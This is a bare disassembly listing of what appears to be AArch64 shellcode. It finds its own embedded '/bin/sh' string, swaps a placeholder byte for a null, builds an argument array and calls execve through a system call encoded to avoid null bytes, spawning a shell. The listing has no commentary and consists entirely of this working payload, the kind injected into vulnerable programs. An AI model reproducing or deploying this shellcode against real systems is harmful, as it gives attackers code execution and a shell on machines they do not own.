
Disassembly of section .text:

0000000000400078 <_start>:
  400078:	1001032b 	adr	x11, 4020dc <__end__+0x2004>
  40007c:	d284040c 	mov	x12, #0x2020                	// #8224
  400080:	cb0c0173 	sub	x19, x11, x12
  400084:	d280fb09 	mov	x9, #0x7d8                 	// #2008
  400088:	d11f4528 	sub	x8, x9, #0x7d1
  40008c:	38286a7f 	strb	wzr, [x19, x8]

0000000000400090 <store_args>:
  400090:	d2800108 	mov	x8, #0x8                   	// #8
  400094:	f8286a73 	str	x19, [x19, x8]
  400098:	d2800208 	mov	x8, #0x10                  	// #16
  40009c:	f8286a7f 	str	xzr, [x19, x8]

00000000004000a0 <execve>:
  4000a0:	aa1303e0 	mov	x0, x19
  4000a4:	b101626b 	adds	x11, x19, #0x58
  4000a8:	d2800a0c 	mov	x12, #0x50                  	// #80
  4000ac:	cb0c0161 	sub	x1, x11, x12
  4000b0:	aa1f03e2 	mov	x2, xzr
  4000b4:	d2801ba8 	mov	x8, #0xdd                  	// #221
  4000b8:	d40266e1 	svc	#0x1337

00000000004000bc <two>:
  4000bc:	6e69622f 	.word	0x6e69622f
  4000c0:	2a68732f 	.word	0x2a68732f
  4000c4:	aaaaaaaa 	.word	0xaaaaaaaa
  4000c8:	aaaaaaaa 	.word	0xaaaaaaaa
  4000cc:	bbbbbbbb 	.word	0xbbbbbbbb
  4000d0:	bbbbbbbb 	.word	0xbbbbbbbb
